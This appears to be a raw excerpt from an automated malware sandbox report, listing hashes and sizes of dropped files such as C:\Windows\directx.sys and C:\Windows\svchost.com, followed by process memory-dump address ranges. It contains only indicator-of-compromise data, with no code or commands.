SHA51257726bbd1328ace0f9159825b8f2b2b2c2c87f69105922cf4bfcc7137df9d5f69442771bd592efb18f8c92f9ab3ac7dfa374295eff605357ac5442659c0f74a3
-
C:\Windows\directx.sysFilesize
57B
MD5dbc4abd387c8a989d4bf0e7e924c38f1
SHA126497e20608dd737641413d19dc44a755090a1a0
SHA2564017d782be14710e5b8d7d3291bb161f915e2c403de167800a7bad50ed7dfe7a
SHA5129470a974592b51ffdfb4327670e59318185febfef993e05b01ec9f9d5cd130221a55d7eccc189cb334f6d22395fbef9e3b0f4d91fa8cee1d63675a4030c9d576
-
C:\Windows\directx.sysFilesize
57B
MD5eb9254e66399da661aaf04f903705e2f
SHA136c612e36d256288d4de393f91676fdbccf56f2f
SHA256ed92c3fe8ba8d02095211487f24ec065a811245f56eea3113bb1a56043a45c4e
SHA512e35fe1fbec8102b12109a37b2cdd9fd1fc1623255608263422c00d1931bdf46fd572c804876cd46111d6c6a55ed08aabae2648fc2434ff87cfb5254b807b5c89
-
C:\Windows\directx.sysFilesize
57B
MD5b32a3ad6977ccef833cff7e943293a3a
SHA190406ddbc51ed859dc67a8a0f5d11d3e5ab6692b
SHA25684d14ea87784663eba52c0a12e8bc76508ad139b0ac37271fe2981b9d67194a2
SHA512052113c371881bd81f4cb076c747d728289907f44dfeab879f9ec285938ba06d45e49c86ad997a0a3e33cd071046b8df9a7f64aa0f2400adb96fb80f4f93dfad
-
C:\Windows\directx.sysFilesize
76B
MD5d05e09a3a48bbebaefdd109fffa02043
SHA1e950a62cc6e699c6d1bfcda226d55c82840a00ed
SHA2563cc2bee11b06e5fe2886ebf26d1cebe0e56f397e65dc53f82258569de168ff6a
SHA512610c3ff3b1bc3d7a197b2bfdc54315604a5d19d98b46b9356f0a59992936467a4d7b6cf35224c457ce0af5bd4ddd9ef1b64dac950a838a47d590750b450eefdd
-
C:\Windows\directx.sysFilesize
92B
MD5788da51db6c51bd3d3472f0851303573
SHA108483046bb5a6e9c6086e5eb5a832fca636781a4
SHA2563e1dbe4b548ab202182904efe92476ff1aa1e49b2bce268262a3b8f2eb5a91e6
SHA512068b330b967fa76b186d8550e1fd4874e9df9e0a83b9be59fb5557ae0a62fe8c7228c354039a641f0baeef7230d87da7eb8f34da540df71a4f8d1b20d8cf65ab
-
C:\Windows\directx.sysFilesize
114B
MD584e5d5256ad9b946bf5bf8bf9739e458
SHA1b2e33e04d8877faeacb9fbc3fe2913e78d31e446
SHA2565313e541056fc6f0193589159bb0850a4d82606d7c1e8d56a79696906dede1b5
SHA512a9928bc66017260d5150418392e9dea8355511ae588fa119e6a0d72380c0d7535190303f968b655778f7e7d4cad0c207d4cf8fecf65ab3e5a33e6cdea63a8ffc
-
C:\Windows\directx.sysFilesize
152B
MD5440d7eb8e030f656b2fba1afbb444de1
SHA14ca3f3ded60a2c8b149e7a3efec521f4861c6abe
SHA256766471fea179f5247145269bb21c481fadd7f373cf4eae557c907c9a22ebfa7a
SHA512c33e818ef8daf4016f679704f78bde25ff7a24ed5663a9aaca58866dc86b118aa4add369f7b5e89421284034a23876dff57f9a9efa16cc7d3a1a745cd4556aaf
-
C:\Windows\directx.sysFilesize
164B
MD57f3e5591c0e9a1c66c1166e38b63f599
SHA185eb7f6418a7ccc36325c63f18bf9b539f840b44
SHA256b6de47739b24f364e34ca2663347de4fdf65a492cabfd7bca406d6915213d401
SHA5121a249ef9e34515900374c679d5657fc4c4a9938d883916a434d2402813794c1870ddd0bdf1e6271752c5731791728dec78cc487b327fed3d6496d21fe69bc8cf
-
C:\Windows\directx.sysFilesize
82B
MD5b3a5721399d0a2b84ddd4f108599c9db
SHA172122815680554f3be434eb8034fd9fbdce3ea77
SHA25697048d82c13bf729831f6f1c1615ccb61ad653f2152062086588c71ec1280475
SHA51227f2848eeb8b41def141d5a8602f3333a9d32ea0dccd2e8fea32316478d1a7316a37f744138c8cc3117e2682a72120935601c2674ff522f9cddc120bcf69d563
-
C:\Windows\directx.sysFilesize
140B
MD59580d95eb097a96efd78aff0eaee5e78
SHA1de3d789196db73fe938df88dc0a2fa2cad4dde45
SHA256de73690b1dd28817a2dc9b3cea59f4aa0f46ed36e0eaaa1bdd5cb54e91043b98
SHA5123be7e66cf1d178c7f530feb41f53ba7d55498f59da50f924f30d3830306f62f7357e93d1fcd072a116e368bbd06606ebd34fc827f60bbb739b5165ef018bc27a
-
C:\Windows\directx.sysFilesize
52B
MD53d7f4ad03c332fa9dca1c4d050f9e649
SHA1af5265069e50257565a5172daf40ac2255d929ed
SHA2561bfd8309354ff4c36d158fb273eb4bd89e788b62088c987dcbf0dcff16e5f697
SHA5125d1bf68ec45f237eb2f186ad2583c0665a560cce50943a0bd2c49966d51c93f01f4be831c504c45409a9ab24c786327a7c85d4f35235ac347f2e3fb7bfd16fd3
-
C:\Windows\directx.sysFilesize
50B
MD56c05c04d4ca919bd3fd1f6935dfd8d83
SHA1760d65036ef4a0a8e231bc54856d45ef1f8d1ae2
SHA256c6b96924abe1760ecdaf08b0f1f957c2cd454345f7236b065834ead9bc5a4bc8
SHA512bc4a6508b0a747e9c1b796c55a76a441873174e850f6c4d4c19b750ca4c855d9219893320eeb2b8244d774421ae528d13dc042797ff257147870b3c61b752324
-
C:\Windows\directx.sysFilesize
54B
MD54f766d6d6c10f07e2afb2f39945d8877
SHA1164125b7b4eabf03f9c33e96dc288ef45894dd74
SHA2565fc973ecd4170c6a0663bd2f2abff0b2f5fd5a6231dad3371adc81e464d7578c
SHA512b007fa35bef46380e7e1a4e23d0209a37a6ad3969ab8e5e2bcaa1c9a5a2a195bdc8de0eaa402a3af9bd43be098c202f1e4e431ae26f7af3579091194c1f824d4
-
C:\Windows\directx.sysFilesize
47B
MD53b3ea05416cf85e6a6ead88cf5b1ee60
SHA105f3551ace972a595d72ef3b5ab5398e2d6ae29b
SHA256fb89e229b1602bea181fa40bba2005ec049ef54d0117eb3e756ff8da1691e8f2
SHA51225c666f884f8a9b8299086e20745ffcba1c25a8fbb6f7a308f503a623e1c0ec0899d5a7a845c3f67fa857a1667e8749d0e287a52f5b11681b81733f09f4fd3a8
-
C:\Windows\directx.sysFilesize
54B
MD567df829ac5da2686fc6de14ca803e762
SHA113ac3a6c6cd7d21923dde59bae5f63e0bda33352
SHA256c8842a88f4a3d15276a7ce7879aba86355b4b16e1ce29162ba4d7160913795a5
SHA512517cfdc0621dc88fde411ab0ab7ac2442eda11b31cfe51ab31634c47e793b88519aa5478f1a7cbd71b287760256cf85d7bbf202589b436b04b8f29f7a6e5a947
-
C:\Windows\directx.sysFilesize
54B
MD5452596b36e7d2c429bd01f285ff04de4
SHA1838174c4afc220c9e4414552c4e6a070e8ab66ca
SHA2563a3e77aaab6202ebb3393678667a21ca4d30795c82b0710e9751b160232bce35
SHA512d4a82c2cf0f9194027c1f061650b0f8c6f47bd431e32f0e587c94682f954485987764d6fa458b0ad2617ffcddd5ba656a3db8418cc392328a98afbfc949802bf
-
C:\Windows\directx.sysFilesize
53B
MD555eb509e2dc6b71d686e65826befbc28
SHA12a968a5e0672df245d02a533f2161d948622ade5
SHA2566c7686a09eb33974217735bf91d741ac79dd6d405f742c294cd68e34b44e2e9a
SHA5127047812da32a2dd331a071480b167f0c87fc2ff307a9fb4b1e8fb983e91477028527b1f163b26b024431fa98657b85ac036efc0e6c3ecc99f77ac914bafacd72
-
C:\Windows\directx.sysFilesize
54B
MD50842b48b779a8151af9a6794e7fd6edb
SHA1a17447028d562021d59a91dd7b8789c2fce6ef5d
SHA256c6a5303a46805781e017148a4ebcaebec674f5a2b10bffcdcacdf06795a02577
SHA512d69740a6a3612e856667cce23c792e09ea470fb492d18727389003c1fe7e8765c79078a870d4b9adb0e882574e8ff36d46093e2072a4d7f1eb1b115e8406530b
-
C:\Windows\directx.sysFilesize
52B
MD559da72abc1c1bef9c75c1a73fe672317
SHA1b17ee003a645c269fb86617ffd037ebd4e66c83a
SHA256390f8e9e759b94a1ee71acdebf2fb9f78316220076325d84c8d4ffa179d700ce
SHA512003755952a0d6332430f60d3bdc7a2af21df5ec3a9d7c7b4b3905be75f578589071ef25af5ac8207b71474c8bea6a50aa736507f481e48a4756d96f0c17aeb7d
-
C:\Windows\directx.sysFilesize
33B
MD548074663d65be1968b6d38fba27cfb9d
SHA15b23440ce1976b8472bc586215cc23c515498e4c
SHA25617b685b05977c384b09a328064920abd0a64e8bbc1644a4bd92ce00cee8c356f
SHA51233b2dd9e68092d5083cf60f957bb576925f8baeb3fba8731f35d73626e769f6157616d0fe1edb8a70065256bdaa3ffe8564a0e4248b16684cc1d2299533431d9
-
C:\Windows\directx.sysMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Windows\directx.sysFilesize
51B
MD5cd01970a07c1e0f9eeb90a7ce63afcb3
SHA117982dc6b5803907611ed0653b0b6ba9f77b1408
SHA2564c9bb96d419992ebc5c6f3467ddcef6c31123a0595a6d0d7e676978c3b0cad31
SHA5125d35bbfb77d106960443721efe90d804309294af742e1fd3dd36551cfbf7b4ae222c87e1c65f5a4ce9ac7530d2edcc3d5a65723581799a1f51cbb26499b9c68c
-
C:\Windows\directx.sysFilesize
54B
MD57f801e1ea379b8dd1c8d3f6fa97abaf8
SHA1ef49d2b4d7a86a992032b4145c1d4b20e892bede
SHA256cf1a2c9ac3bf84976ef020ef24e2fd146e9bfcddacd275a366d65413c1623bcb
SHA512ca76fa3762cd10a170ce3d0b2083511a8891b25ba175e9a4300c959b52f6e521afc69b659e184bbc6d36486b5d6b29166560180ee19ec49d3bffb11443fb77bb
-
C:\Windows\directx.sysFilesize
50B
MD5596d773886bc7ac4ef0ceb1824c5e2a5
SHA1ea1b48fdd2f1fe9adc54b8fc4a6b13836ecc3a3e
SHA25659b19eeb270ddba034ca3b4de825dd7743012c767d6809924f7c23beee602c2a
SHA512225649e81feddde635444a09d7782a5e21ff97b4d67d0db8f1ccdb61a6da4428e23bb65d5244731954fd3c6bdb7c3792c468d703eb8d3f8f7de2b4dce3179c26
-
C:\Windows\directx.sysFilesize
48B
MD506e1f5c93648430c96e117d6ec12834d
SHA11a9d81222656fbc8f5abce880617bf98dad37543
SHA25615f7849522efbf34a8dfd1b91940beb1e51344f9cbea187a81f2a06bb5d010b7
SHA5122fb9aa1e8c309f9d117d6e86f5c59fd8d6ba8fa5a79360612e6a44caf4e4db181ad391172804cf6597ec49a44b7d6a9fa4cdcf8216f0ccab970a1ac0479ed36d
-
C:\Windows\directx.sysFilesize
54B
MD50144b58c9b9e22efc34a5bdde8c1abc7
SHA14c16c3b3872802e156448131280f8e1edafd4343
SHA2563ef4c308663d165ffdf8e85c775e53c8a420494f6e119e97b62d176c0069f263
SHA512eb29b99b427f249c6424c1abd065475fecf06c2a762e49780b5c9071fa4049c8b532464de4a10e3c4c8a10706180f58373df9cd176b4c199000e5b99c7e4e457
-
C:\Windows\directx.sysFilesize
47B
MD58a96748e656caf22d9e64ce342bcfc3e
SHA190ee4860e8554dc0950610fdf8151e759832f528
SHA2561ca11ed09e232331ff2d75bce2948f38a3149c592bd059c18380b266d56a26ec
SHA5124fd1d3ef975bff4bdb758b1b7cda350e460a8aff827dbf98a321eb059625550c4977d4292a23286e2334465d242ac71e2353dd7e674126d7c3733aa902cb5d2d
-
C:\Windows\directx.sysFilesize
94B
MD5336e6cf5628c73f3345be9ce2143ad42
SHA1ba6bbe7c9b48da7cd74e7cccd2a38daa3f81cc2d
SHA256f0f97d81499acb34e89ddad4b3afd013f7468f493cb098ac095ff2b5e7e64261
SHA5125eb99f0dfd6e9725c02aba943669dbf9ecf18ab17ec19b84651b62542074c05e19f5291fc895b7cf14e329c39965e09c8490d9ab76ac8a9c39fcfd972b7be598
-
C:\Windows\directx.sysFilesize
81B
MD59c2c6a3387e3261b9cc31851d55badbe
SHA1b3427a94e047fce63a6f9d07e91974617c00877e
SHA256297b3b5a078b9d813fca01624f6f70ce2a0d2588436392d4799dae902fe58b9d
SHA5122b607c11bbd1b27ccb57051743c6c7040cd5b545fba2736b675004727e7047f1d09250c08b716e6518486ad8ee276b8b18a24e7af2346f3005033b9b9c072dd9
-
C:\Windows\directx.sysFilesize
95B
MD53dbed3be0981639c5b7e59aba0826b88
SHA15ba6964b4e08d688abe12494c3775ed70ebb2017
SHA256b5f8030d1a98650cfa4590f27cb49253c05b29c1694c1631487292e3aaab8360
SHA512d4d0aee5486c7377360654fa2518b2a3a6fe0dfba6413aad6856f2b4a3806ed97ff6af41d4e04f4f9ba030134486a80bd9256453cc3d27b4543104a7691bcd26
-
C:\Windows\directx.sysFilesize
95B
MD51de7acf9339052397ae23b75f4d189a0
SHA1c79dff26272c187d10994282f82a031839122cb5
SHA2569fa5544b6d95182fd999d6bf200531ee323dfd129c421f45dafc356a31041a56
SHA512dc07b295b86ebb7467b92a497f821a02aff2ad808e94f18541da4ed701c2af659786c06c34296ca2526d10cdec7d3ea3844e7f9777198fd8fe6244b0caa2a40e
-
C:\Windows\directx.sysFilesize
101B
MD510fbffc9c889bba4c3d45dc699ca5226
SHA1b7beadb9b3dc237ebbad8913c709c0d13135a545
SHA256274b03bf2b0aa94d26710a2f1e2f1b6f6f545109d273269db80e8b77049e6f99
SHA512a10fe8343c63b5ee06966e5730414ddc717125ec99282b25ea773e68c530b90c62bc82c9b1037785a99b00250b7522c2ded3ebb876aa89d4ea3a70c5538f1245
-
C:\Windows\directx.sysFilesize
93B
MD5027c8a60a61518de050f94b12b531e27
SHA11e76556626067365646537576c3ab94a588b2861
SHA25641df81bb4711f8e4432816694f4ce03d4d137aebb4276837160c1b3f283fe2b0
SHA5122a03ebc9f881cb7944d7ff0f0553335b992f7f1dfaad8422d985fc5e27a12685a5ab6c55aad18e11cd014730190b12337794bd0175ea0d0bd750bc1e224a98aa
-
C:\Windows\directx.sysFilesize
97B
MD5113ff40e17e37c402a268f049883ccfb
SHA145b8f6df73dde89a8f2a4922438bd5fcb5a6e262
SHA256b16a88b7c67e4bfb7f1f619729c2efdf2d8c745a8efd89fdd854c57f52f2f001
SHA512be44255e4d8e21180b2c7758aae127aea91d6fc32f788272e3024282dc58bb404eda837f02b2e09b17510947badf5f6fd2da61988d0b23979816ffc95c61f36f
-
C:\Windows\directx.sysFilesize
101B
MD523d87402679f06fd75526a56df486b54
SHA1040a396b1f88af656369bfed2e718fdf8d155721
SHA256e27f423c63dff7f5b1b1b5a8dcf45e516bb90fee88f4ebb58e09a39636d2f624
SHA5127e66945d4c13ddf451ad52588545cf28742378e98f04cb603d3e9b228622991e4e99ce8899eae4b6430c5e7fede8120b4a179d4654858ba9905c595fa528fc93
-
C:\Windows\directx.sysFilesize
93B
MD540afa222e6143f8fe084b67d5bfbbfc4
SHA14d1b8e71d858637b21810052ea206eaf6b9c8d37
SHA256d9fbe65a4ea9e21080129afd1d741d4bae9e7c8441ca1f3206f7f1deb176d3b1
SHA5123b1646357c5546698ca4f0229f81b2d45c5b75f736109126d6013ac8e772939441c728b97cd5320ef51cbe7e3adf31986418718a7f544bf63a08077e885708ae
-
C:\Windows\directx.sysFilesize
80B
MD5e33b65d14373e762af1c97c6264e8806
SHA12928afde4374d64734be4ebae27fe630faa057c5
SHA2569ade85d434989196eb5fe7fc3bf9fcf8462720b0bb743a5a51b4780a09b4c72e
SHA5125d1b290295cf9bdb3a41c3674a58ed5991432dd3963f3300d4e840adb2d057256095d1364d70b5d778a3f18704f4c2ecc070a3a0138dba239063e3c68f04cb4d
-
C:\Windows\directx.sysFilesize
101B
MD5d7765bc594a0b8a38f00711ac7ca7ba7
SHA1a66161ee41334e4d835ef16dc7fa47cbab439f22
SHA256dd7019d6bbf86e8dddfd2d6bfa30e86193cd25e89d72893ffcbe8648348fa45c
SHA512ef79e2feda324071a16edfc85b57143d6c282d1fbfded08cadf2f085ddce2fad8bf5adf79537d14d7f01897ebb596938db277d8058b9df9fc0d0ee664421657e
-
C:\Windows\directx.sysFilesize
94B
MD59dc933735e651d41169d3e9bededfe91
SHA1139dcbf9a7c2a630339f748407b10ace9e3e981a
SHA256b2debbe99d08abd8765f3468a6c0f68bc99c5175e160d5ae0edc4a9c25796f23
SHA512fe83c26ffa5f7cc95fb9b0ceb002dab78f5f04a0f1888617b94c2e9943147c48a316d3dd59ea6d0c2c31372e79747b2d2a8440d949759d845925e3f749c8b503
-
C:\Windows\directx.sysFilesize
94B
MD5bf26a9abf395dcdc7631d8badd09f1ed
SHA1ac395bf6f9696fa76000ca828dfd36e232e330ca
SHA256e4b293208e2822fccb2400a12902d2cb1d6ee5a832ad1708d90f9b5e9e3b0411
SHA512273fbf9f8858ed01b6d71c88a220bd3fb7581f6fa280ff9c5421761e88fd5eab4bcbd7f048d6dff739ca66a3bb8fc2a6cde9b5d45f4140af3db5ef4e2463bdbc
-
C:\Windows\directx.sysFilesize
101B
MD5f84c883032e9ee38e1e6ab5b4637dabb
SHA1834e082a332efc29f1bb384e4846a47cdd33c61e
SHA2565ad5d0d0ab0afc87fa4530a76abafc65bbebb59be5b14358df19ae317ec2075e
SHA51215cfc4759c9af2f09c0f68b06978b31d9b043c3366dd04878be62fc4c1bae64f68c2175c9734c20f956b7d33ae9e0d90a0334488c9fd1069d08a1db42487c227
-
C:\Windows\directx.sysFilesize
95B
MD557a8fcbd154d66d77c4b0b98281b39cb
SHA18faf2597ece170ccf033960c81b907ef64f5e3b1
SHA2566d3b8e0ff1d7df85c8360d34ee422333f615a53c72d75f1557bd426a1eb84c05
SHA51263e5aa956d854f1fe3924cd830afa6ae6c6dec76529fe9027149a149079703ecd8a40af404844145f0fa88fd542f2abe5a8d105626f88b365b7b75d3f3ab8c15
-
C:\Windows\directx.sysFilesize
96B
MD5fdf33a862ef8050cf6d732b66bbf8ec6
SHA104dd038bcff5ee6bdc95108b4cff3ff14f047381
SHA25628bb81184b0af9c356ff1dc287587719341806ae805ab60c234c0539b4fb1662
SHA512c449ae249531773215bd1c2cd618fa8b18ec14ea9fa3b5a49cd2635f80eb4e253a43a5cf1ae9de896c05ced7e700b7b912b1eb9ee18f03f2adc2817d6c90eb3c
-
C:\Windows\directx.sysFilesize
62B
MD5de5d42d96912568966ea7406e9dbbcfa
SHA1bfdeed997d270214d0765a65feb4b8677fab10ce
SHA2567fb96bd03a887d810201abfc497693c929e1a8c120812100c960a6306bca327d
SHA512e61a7e55b16646d9aa118e4a0b481a6e679a2a624ca4d4517dc6fb6db546518bd0c93d4e604ab36e32a14e492b7c3a6063626c6cad9b59aaac8864895dfeb5ea
-
C:\Windows\directx.sysFilesize
99B
MD50849961e93574a3a5791d8e22d357b78
SHA1c16413a8934267d23b847c655f6cd8e84e9c7b9e
SHA256d69986bfd2d7cd978f85d42c820e2ef3fe0ef9bfa60533dfb59b06115a80c01d
SHA51299064e45fc32b363e5674ab9502806278a8bfb25a488b28b69cc54d97f33a6d5d7232fb10cf7a1a950a236638c8ff0f2cb3299e7292a54786661af88286aeb0b
-
C:\Windows\directx.sysFilesize
98B
MD5a3b8ed76922b81fe09ac0821c3e5b6db
SHA1ee0bea1cf886b298b41236ea67bb99d38e640865
SHA256e69565f20c06e6c402557028535608ac19755737525297113d480746a70881a2
SHA512b7e42a6c24ea702946ffbf1ec239882e729a4f445e505f45411be77b6da9ede94b517949ef78a257513cf99ecad0b00f3a5be7b98a2d9da236e922fea0720393
-
C:\Windows\directx.sysFilesize
96B
MD55984e33ae13c60f5085da0e5d20078d9
SHA18d3234b168cfaef80c16ec257c9762e762fc6182
SHA256baad5d3713dad48dd4843c9db99d07e22439916e1c63eaa56e1a1141c76bb302
SHA512389041a5d49f8de1af46f8f0bf1903ccbd3a7d5bc619e8452b7a33ebb07d9fdfbfc2997215e1434c114cb9c16817402169d27cf4c17e2b2f7d950712dc5bf384
-
C:\Windows\directx.sysFilesize
101B
MD5f7f4485b068800d97496814ebb5398da
SHA124a4a1d1a439f4198d07be8df025898a54d351d8
SHA256b004a83e1876566f23f9d5f8a1f0cbb13d0c600206f39eeea2784f4618e02ee7
SHA512e6dc550448bf119119f56d7e57c88ef4376700ea51f0da8c0e71c5fc96da0ebd52f321b5998f58e708b91d736af092d5a61c77a29ddbc521ae8eae50f0360988
-
C:\Windows\directx.sysFilesize
101B
MD56357edcb6e90ec9ffaa5462616280d52
SHA19fb5f85224fd268ca94521e7698ec8d534309c0e
SHA256a73db196a82a34ffe613688ae978dd7dc0bbb8d6d577a4dd6f63d803106937ca
SHA5126e8a5a18daf1615392f2a9f05cca87a229eb5b773062ae433ae3a76bd44c7af6e3010a378e0a277c5d61473d33a835d68ec57835e2853efa9a08c0d94a2de752
-
C:\Windows\directx.sysFilesize
101B
MD5b4fb00cba5e12ce6eec43cde01b63722
SHA1cf7e7d09268e64f0b4e2a38aedb63e7247da38a8
SHA256597b61b16ca1446e7af46ac03f772c27ce7552b5cf8b9550c106de7a58bd9509
SHA51234307a8df4bb2f187bd656138a74a8efe849aa51b8ccb5177a114a369f8189464442952b1c4e64d4af3e14d9ee38bf47b254db05cd852039d2282bbac42d11ce
-
C:\Windows\directx.sysFilesize
103B
MD538c538d336f86d1bb4af9575a3296783
SHA16c0cd3ca2e8508a46aa95a5bee671cb71ab06909
SHA2566b620dcec4d3b9a884729c18058cb55801849996cef5e6affc1c1fd8c959aeb5
SHA512d1f1ba8e4dd62839b40f1623b05525131ce4b1a7282e82239aa84f11cc7c3e17203800294c6684ee152fe33670f9c00fc7daf8d963d571d5af360344c6f9c6df
-
C:\Windows\directx.sysFilesize
97B
MD5213baaa2fbbf4a4614ee7340025b43d7
SHA1db03a9bb43a5aa23752dcfc5622886096a2b4e5d
SHA256cdfe52f11e2decf4a556d9416f854e5d27d7d455d214f999c9712e89a7190bc1
SHA512700a42f2483f50bf15d93e8cd9871a8b683f29560039e54f387e3dac3cd3c4564070ac9cbb03b2ebc67cc1eb24916eaa489ec96d562bfd23808498ac6725b3e5
-
C:\Windows\svchost.comFilesize
40KB
MD536fd5e09c417c767a952b4609d73a54b
SHA1299399c5a2403080a5bf67fb46faec210025b36d
SHA256980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2
SHA5121813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92
-
C:\odt\OFFICE~1.EXEFilesize
1.5MB
MD51ed425a4542b8e369b6c9a8f67330ad4
SHA12c39f3628bdefa5bb0d36263672011d9e76bbf35
SHA25636570e5d63f08df0879d556e4a7c910085ae10ad45a15182992e44171bc7296b
SHA512e44883a2a88fa3f032cd27b5a5790c5c344c62d445e7a0a815fa837eed8680a5e73a5bf03ecf2b02b7361cfff7e9fbaf17f6b26b5d05abc7d7713704433fc874
-
memory/1240-194-0x0000000000400000-0x000000000050F000-memory.dmpFilesize
1.1MB
-
memory/1240-191-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/1240-189-0x00007FFA09AD0000-0x00007FFA09CC5000-memory.dmpFilesize
2.0MB
-
memory/1240-179-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/2120-93-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/2120-101-0x000000001B7F0000-0x000000001B800000-memory.dmpFilesize
64KB
-
memory/2120-48-0x0000000000710000-0x0000000000A34000-memory.dmpFilesize
3.1MB
-
memory/2120-137-0x000000001C240000-0x000000001C2F2000-memory.dmpFilesize
712KB
-
memory/2120-49-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/2120-50-0x000000001B7F0000-0x000000001B800000-memory.dmpFilesize
64KB
-
memory/2120-79-0x000000001C130000-0x000000001C180000-memory.dmpFilesize
320KB
-
memory/2168-165-0x00000000058B0000-0x00000000058BA000-memory.dmpFilesize
40KB
-
memory/2168-124-0x0000000000960000-0x0000000000A22000-memory.dmpFilesize
776KB
-
memory/2168-127-0x0000000074F30000-0x00000000756E0000-memory.dmpFilesize
7.7MB
-
memory/2168-227-0x0000000074F30000-0x00000000756E0000-memory.dmpFilesize
7.7MB
-
memory/2168-159-0x0000000005F60000-0x00000000062B4000-memory.dmpFilesize
3.3MB
-
memory/2168-141-0x0000000005510000-0x00000000055A2000-memory.dmpFilesize
584KB
-
memory/2168-136-0x00000000059B0000-0x0000000005F54000-memory.dmpFilesize
5.6MB
-
memory/2168-236-0x0000000005270000-0x0000000005280000-memory.dmpFilesize
64KB
-
memory/2168-135-0x0000000005270000-0x0000000005280000-memory.dmpFilesize
64KB
-
memory/2276-225-0x0000000001020000-0x0000000001088000-memory.dmpFilesize
416KB
-
memory/2276-120-0x00007FF987870000-0x00007FF987871000-memory.dmpFilesize
4KB
-
memory/2276-78-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/2276-77-0x00000000000F0000-0x00000000007F6000-memory.dmpFilesize
7.0MB
-
memory/2276-80-0x000000001B760000-0x000000001B770000-memory.dmpFilesize
64KB
-
memory/2276-223-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/2276-81-0x0000000000FF0000-0x0000000001016000-memory.dmpFilesize
152KB
-
memory/2276-221-0x0000000000FF0000-0x0000000001016000-memory.dmpFilesize
152KB
-
memory/2276-220-0x0000000001020000-0x0000000001088000-memory.dmpFilesize
416KB
-
memory/2276-210-0x0000000000FF0000-0x0000000001016000-memory.dmpFilesize
152KB
-
memory/2276-91-0x0000000001020000-0x0000000001088000-memory.dmpFilesize
416KB
-
memory/2276-90-0x0000000000FF0000-0x0000000001016000-memory.dmpFilesize
152KB
-
memory/2276-104-0x00007FF987880000-0x00007FF987881000-memory.dmpFilesize
4KB
-
memory/2276-103-0x0000000001020000-0x0000000001088000-memory.dmpFilesize
416KB
-
memory/2276-102-0x00007FF987850000-0x00007FF987851000-memory.dmpFilesize
4KB
-
memory/2276-190-0x0000000000FF0000-0x0000000001016000-memory.dmpFilesize
152KB
-
memory/2276-105-0x00007FF987840000-0x00007FF987841000-memory.dmpFilesize
4KB
-
memory/2276-109-0x00007FF987920000-0x00007FF987921000-memory.dmpFilesize
4KB
-
memory/2276-111-0x00007FF987890000-0x00007FF987891000-memory.dmpFilesize
4KB
-
memory/2276-112-0x00007FF987860000-0x00007FF987861000-memory.dmpFilesize
4KB
-
memory/2276-122-0x00007FF9878A0000-0x00007FF9878A1000-memory.dmpFilesize
4KB
-
memory/2276-164-0x000000001B760000-0x000000001B770000-memory.dmpFilesize
64KB
-
memory/2276-163-0x00007FF9E8B60000-0x00007FF9E9621000-memory.dmpFilesize
10.8MB
-
memory/2276-162-0x000000001B760000-0x000000001B770000-memory.dmpFilesize
64KB
-
memory/2276-126-0x00007FF9882A0000-0x00007FF9882A1000-memory.dmpFilesize
4KB
-
memory/2276-125-0x00007FF9878C0000-0x00007FF9878C1000-memory.dmpFilesize
4KB
-
memory/2276-123-0x00007FF9878B0000-0x00007FF9878B1000-memory.dmpFilesize
4KB
-
memory/2276-129-0x00007FF989B80000-0x00007FF989B81000-memory.dmpFilesize
4KB
-
memory/2276-128-0x00007FF9882B0000-0x00007FF9882B1000-memory.dmpFilesize
4KB
-
memory/2276-130-0x00007FF989B90000-0x00007FF989B91000-memory.dmpFilesize
4KB
-
memory/2276-133-0x00007FF989BB0000-0x00007FF989BB1000-memory.dmpFilesize
4KB
-
memory/2276-134-0x00007FF989BC0000-0x00007FF989BC1000-memory.dmpFilesize
4KB
-
memory/2276-131-0x00007FF989BA0000-0x00007FF989BA1000-memory.dmpFilesize
4KB
-
memory/2356-21-0x00000000058D0000-0x00000000058E0000-memory.dmpFilesize
64KB
-
memory/2356-2-0x0000000005660000-0x00000000056FC000-memory.dmpFilesize
624KB
-
memory/2356-3-0x00000000058D0000-0x00000000058E0000-memory.dmpFilesize
64KB
-
memory/2356-1-0x0000000000CC0000-0x0000000000CC8000-memory.dmpFilesize
32KB
-
memory/2356-4-0x0000000074F30000-0x00000000756E0000-memory.dmpFilesize
7.7MB
-
memory/2356-0-0x0000000074F30000-0x00000000756E0000-memory.dmpFilesize
7.7MB
-
memory/2492-192-0x000001B40AB70000-0x000001B40AB71000-memory.dmpFilesize
4KB
-
memory/2832-345-0x0000000000300000-0x00000000003A8000-memory.dmpFilesize
672KB
-
memory/2832-349-0x0000000074F30000-0x00000000756E0000-memory.dmpFilesize
7.7MB
-
memory/3988-100-0x00007FF789EB0000-0x00007FF78A198000-memory.dmpFilesize
2.9MB
-
memory/3988-161-0x00007FF789EB0000-0x00007FF78A198000-memory.dmpFilesize
2.9MB
-
memory/3988-209-0x00007FF789EB0000-0x00007FF78A198000-memory.dmpFilesize
2.9MB
-
memory/4436-188-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/4900-106-0x00007FFA09AD0000-0x00007FFA09CC5000-memory.dmpFilesize
2.0MB
-
memory/4900-292-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4900-64-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4940-34-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4940-33-0x0000000000E00000-0x0000000000E80000-memory.dmpFilesize
512KB
-
memory/4940-36-0x00000000702B0000-0x000000007042B000-memory.dmpFilesize
1.5MB
-
memory/4940-35-0x00007FFA09AD0000-0x00007FFA09CC5000-memory.dmpFilesize
2.0MB
